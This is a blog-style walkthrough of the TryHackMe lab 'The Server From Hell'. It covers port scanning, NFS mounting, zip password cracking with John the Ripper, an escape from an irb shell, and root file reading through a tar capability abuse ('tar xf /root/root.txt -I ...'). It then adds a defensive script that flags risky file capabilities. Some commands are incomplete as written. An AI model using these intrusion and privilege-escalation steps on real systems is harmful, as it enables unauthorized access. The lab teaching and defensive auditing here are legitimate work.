TryHackMe Walkthrough: The Server From Hell


Last updated on July 4, 2021

In this article we are going to solve another TryHackMe challenge called The Server From Hell, created by Youssef Awad. So without wasting time, let's go.

Level : Easy

Attacking Strategy

  • Enumeration
    • netcat
    • NFS
  • Exploitation
    • cracking zip file
    • irb shell
  • Privilege Escalation
    • getcap to check file capabilities


We use Rustscan for reconnaissance. The lab description says to check port 1337, so we look into it first; there is a hint there which tells us that something is in the first 100 ports, so we scan those 100 ports with Rustscan.

netcat 1337
rustscan --ulimit 5001 -r 1-110 -- -sC -sV -oN nmap

While checking all 100 ports, a string on port 21 catches our eye: that port is the default for the FTP service, but here the banner says to check 12345.

When we check port 12345 with netcat, we find another hint, which leads to NFS. From the hint we learn that the /home/nfs directory can be mounted.

After mounting the file system we get a backup zip which is password protected.

netcat 12345
showmount -e
mkdir /tmp/serverfromhell
sudo mount -t nfs /tmp/serverfromhell


Now it's time to crack the zip password. There are different ways to do that: you can use fcrackzip or John the Ripper.

zip2john >backup.hash
john --wordlist=../../rockyou.txt backup.hash

Now we have the credentials to unzip the archive. After doing so we find a key which lets us log in to the remote server over SSH without a password. On the default port 22, however, we get a bad request, but there is a hint which tells us that something is between 2500-4500. So we load Rustscan again to enumerate further, and we find that port 3333 has an OpenSSH service running.

rustscan --ulimit 5001 -r 2500-4500 -- -sC -sV -oN hint_nmap

Privilege Escalation

Now let's log in to the server with the id_rsa key. After login we find that we land in an interactive Ruby shell (irb), and to get bash we have to use the system function.

chmod 0600 id_rsa
ssh -i id_rsa [email protected] -p 3333
system "/bin/bash"

Now it's time to get root. We enumerate further and find a hint about getcap, and with the help of GTFOBins we exploit it.

getcap -r / 2>/dev/null
tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'
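
The same getcap listing is what a defender reviews when auditing a host. The following is an added example, not part of the original walkthrough: it filters `getcap -r` output for capabilities that bypass file permissions or change identity. The sample lines are constructed, and the function name `flag_risky_caps` and the choice of risky capabilities are assumptions of this example.

```sh
#!/bin/sh
# Added example: flag binaries whose file capabilities allow permission
# bypass or identity changes. Feed it the output of `getcap -r /`.

# Capabilities treated as risky here (this list is an assumption of the example).
RISKY='cap_dac_read_search|cap_dac_override|cap_setuid|cap_setgid|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner'

# Constructed sample covering both getcap output styles:
#   older libcap: "/path = cap_x+ep"      newer libcap: "/path cap_x=ep"
SAMPLE='/usr/bin/ping = cap_net_raw+ep
/bin/tar = cap_dac_read_search+ep
/usr/bin/python3.8 cap_setuid,cap_net_bind_service=ep
/usr/bin/mtr-packet cap_net_raw=ep'

# Reads getcap lines on stdin, prints "path<TAB>risky capabilities" per finding.
# Limitation: in the newer format a path containing spaces is not handled.
flag_risky_caps() {
  while IFS= read -r line; do
    [ -z "$line" ] && continue
    case $line in
      *' = '*) path=${line%% = *}; caps=${line#* = } ;;
      *)       path=${line%% *};   caps=${line#* }   ;;
    esac
    # Collect every risky capability named in the set, de-duplicated.
    hits=$(printf '%s\n' "$caps" | grep -oE "$RISKY" | sort -u | paste -sd, -)
    # An empty list before the flags ("=ep") grants every capability.
    case $caps in
      =*[ep]*) hits=ALL ;;
    esac
    if [ -n "$hits" ]; then
      printf '%s\t%s\n' "$path" "$hits"
    fi
  done
}

# Demo on the constructed sample; on a real host use:
#   getcap -r / 2>/dev/null | flag_risky_caps
printf '%s\n' "$SAMPLE" | flag_risky_caps
```

A capability that a flagged binary does not need can be removed with `setcap -r <path>`.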
